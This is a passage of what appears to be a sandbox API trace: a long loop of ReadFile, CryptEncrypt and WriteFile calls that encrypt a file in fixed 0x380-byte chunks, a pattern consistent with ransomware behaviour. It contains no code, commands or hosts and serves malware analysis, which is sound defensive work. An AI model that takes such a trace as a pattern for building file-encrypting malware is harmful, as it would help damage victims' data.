pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.063] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.064] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.065] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.065] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.065] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.066] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.068] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.069] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.070] WriteFile (in: hFile=0x5d3c, 